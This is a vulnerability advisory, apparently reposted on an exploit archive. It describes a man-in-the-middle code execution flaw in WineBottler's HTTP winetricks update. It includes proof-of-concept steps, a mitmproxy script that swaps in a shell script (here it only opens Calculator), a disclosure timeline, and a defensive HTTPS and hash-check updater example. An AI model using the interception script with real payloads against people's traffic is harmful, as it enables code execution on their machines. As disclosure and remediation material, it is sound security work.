WineBottler 1.8-rc4 Man-In-The-Middle / Code Execution Vulnerability
Man in the Middle Remote Code Execution Vulnerability in WineBottler and its Bundles

Metadata
===================================================
Release Date: 17-10-2016
Author: Florian Bogner // Kapsch BusinessCom AG (https://www.kapsch.net/kbc)
Affected product: WineBottler (http://winebottler.kronenberg.org/)
Affected versions: up to the still current version 1.8-rc4
Tested on: OS X El Capitan 10.11.6
CVE: product not covered
URL: https://bogner.sh/2016/10/man-in-the-middle-remote-code-execution-vulnerability-in-winebottler-and-its-bundles/
Video: https://youtu.be/nwcZIn2s6Vc
Vulnerability Status: No patch available - Developer became unresponsive after promising to fix the issue

Product Description
===================================================
WineBottler packages Windows-based programs like browsers, media players, games or business applications snugly into Mac app bundles.

Vulnerability Description
===================================================
Whenever WineBottler is launched it tries to update the bundled winetricks (https://github.com/Winetricks/winetricks) library. However, as this update is carried out over unencrypted HTTP, an attacker with man-in-the-middle capabilities can replace the downloaded winetricks.sh shell script. As the script is also launched immediately after downloading, this is a reliable man-in-the-middle remote code execution vulnerability.

The issue also affects all the bundles created with WineBottler. However, I think it can only be abused on their first launch. This greatly limits the attack surface.

PoC
===================================================
1.) Set up an HTTP proxy like Burp (https://portswigger.net/burp/)
2.) Redirect all HTTP traffic to this proxy
3.) Launch WineBottler
4.) Modify the request to http://winetricks.org/winetricks so that it returns a valid shell script.
5.) Remote code execution has been gained!

The following mitmproxy (https://mitmproxy.org/index.html) script "drunken-winebottler.py" can be used to automate the attack:

    from mitmproxy.models import decoded

    NEWLINE = '\r\n'

    def response(context, flow):
        # only touch the winetricks update request, which the server answers with a 301
        if flow.request.url == "http://winetricks.org/winetricks" and flow.response.status_code == 301 and flow.request.method == "GET":
            flow.response.status_code = 200  # overwrite 301 status code to 200
            with decoded(flow.response):  # automatically decode gzipped responses.
                flow.response.content = ""  # replace original script to launch Calculator.app
                flow.response.content += '#!/bin/sh' + NEWLINE
                flow.response.content += '/usr/bin/open /Applications/Calculator.app'

Disclosure Timeline
===================================================
29.5.2016: The issue has been discovered
30.5.2016: Tried to establish initial contact with the developer using Facebook
31.5.2016: Requested CVE number; Retried to contact developer using Facebook
1.6.2016: MITRE declined CVE: The product is not covered.
2.6.2016: Created this documentation; Sent to developer using mail
18.6.2016: Developer responded on Facebook
20.6.2016: Developer promised that Winetricks update will be switched to HTTPS. Agreed on the 29.7. for the public disclosure
25.7.2016: Tried to contact developer as no new version has been released - no success
29.7.2016: Initially agreed public disclosure date - rescheduled
31.7.2016: Tried again to contact developer - again no success
13.8.2016: Tried a last time to get in touch with the developer - again no success
17.10.2016: Public disclosure although unfixed: Developer unresponsive for several months

Suggested Solution
===================================================
All requests should be carried out over encrypted communication channels like HTTPS. The author already mentioned (https://mike.kronenberg.org/winebottler-1-7-52/) that he is planning to do so in the future. Yet, right now there is no patch available.
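As an added illustration of the suggested fix (example code, not WineBottler's or the advisory author's): a hardened script updater that refuses plain HTTP, including a redirect downgrade like the 301 the PoC rewrites, and verifies a pinned SHA-256 before the script is handed to the launcher. The fetch callback, the hostname and the pinned digest are constructed so the example runs offline.

```python
import hashlib
from urllib.parse import urlparse

class UpdateRejected(Exception):
    """Raised when a fetched script must not be executed."""

def _require_https(url):
    # Plain http:// is exactly the transport the advisory's PoC tampers with.
    if urlparse(url).scheme != "https":
        raise UpdateRejected("insecure transport: %s" % url)

def fetch_script(url, expected_sha256, fetch):
    """Return the script bytes only if fetched over HTTPS and the digest matches.

    `fetch(url)` -> (final_url, body) is injected (assumption) so the example
    runs offline; real code would use urllib with certificate checks left on.
    """
    _require_https(url)
    final_url, body = fetch(url)
    _require_https(final_url)  # a 301 to http:// would reopen the MITM window
    digest = hashlib.sha256(body).hexdigest()
    if digest != expected_sha256:
        raise UpdateRejected("digest mismatch: %s" % digest)
    return body

# Constructed sample data, not real winetricks content or its digest.
GOOD_SCRIPT = b"#!/bin/sh\necho winetricks stub\n"
GOOD_SHA256 = hashlib.sha256(GOOD_SCRIPT).hexdigest()
TAMPERED = b"#!/bin/sh\n/usr/bin/open /Applications/Calculator.app\n"

def fake_fetch_ok(url):
    return ("https://example.invalid/winetricks", GOOD_SCRIPT)

def fake_fetch_tampered(url):
    return ("https://example.invalid/winetricks", TAMPERED)

def fake_fetch_downgrade(url):
    # Server redirects the HTTPS request to plain HTTP, like the PoC's 301.
    return ("http://example.invalid/winetricks", GOOD_SCRIPT)

def try_update(url, fetch):
    """Return (ok, reason) so the launcher can log why an update was refused."""
    try:
        fetch_script(url, GOOD_SHA256, fetch)
        return True, "verified"
    except UpdateRejected as e:
        return False, str(e)
```

Either check alone is insufficient: HTTPS without the digest still trusts whatever the server (or a compromised CDN) serves, and the digest without HTTPS leaks which version is being fetched and invites downgrade attempts, so the updater applies both before anything is executed.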
The only workaround would be to block outgoing (HTTP) connections. However, whenever I tried that, WineBottler stalled...

# 0day.today [2024-11-14] #